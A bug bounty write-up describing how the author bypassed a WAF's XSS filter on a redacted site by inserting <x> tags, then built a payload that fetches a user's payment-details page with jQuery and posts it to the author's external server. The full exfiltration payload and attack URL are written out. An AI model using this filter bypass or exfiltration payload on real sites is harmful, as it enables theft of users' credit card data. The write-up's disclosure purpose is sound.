Bypassing XSS filter and Stealing User Payment Data

So here is another writeup about how I bypassed XSS filter and created a payload to get user credit card data. It was a private program on bugcrowd, let’s just say it was named Redact.

Here is the URL https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=XSS The parameter searchValue was reflected inside an input feild.

So by putting an “ I was able to break out of the input field, after that, I tried the most basic payload “><script>alert(1)</script>, but unfortunately my request was blocked by WAF. so I tried another payload “onmouseover=alert(1) and again my request was blocked by WAF.

After some playing around, I found out that anything between <> was being removed, so if type something like this “o<x>nmouseover=alert<x>1//

<x> will be removed leaving it only with “onmouseover=alert(1)// and finally i was able to pop up a XSS.

Now there was a page which allows the user to view their payment Data https://www.redact.com/us/en/smbpro/my-account/payment-details, so I thought it would be a good idea to include this in my report that how I can get users credit card data with this XSS.

So the Payload for stealing user credit card data was this “o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

As the page was using jQuery, I requested the whole payment data page with $.get() and posted the page content to my server with $.post(), so now with this payload, I was able to get users payment data:

https://www.redact.com/us/en/my-account/quotes?searchCriteria=QuoteID&amountOperator=equal&searchValue=“o<x>nmouseover=$.get<x>(‘https://www.redact.com/us/en/my-account/payment-details',function<x>(res){$.post<x>('https://osamaavvan.000webhostapp.com/r.php',{res})})//

But unfortunately, my report got duplicate.

Thank You for Reading.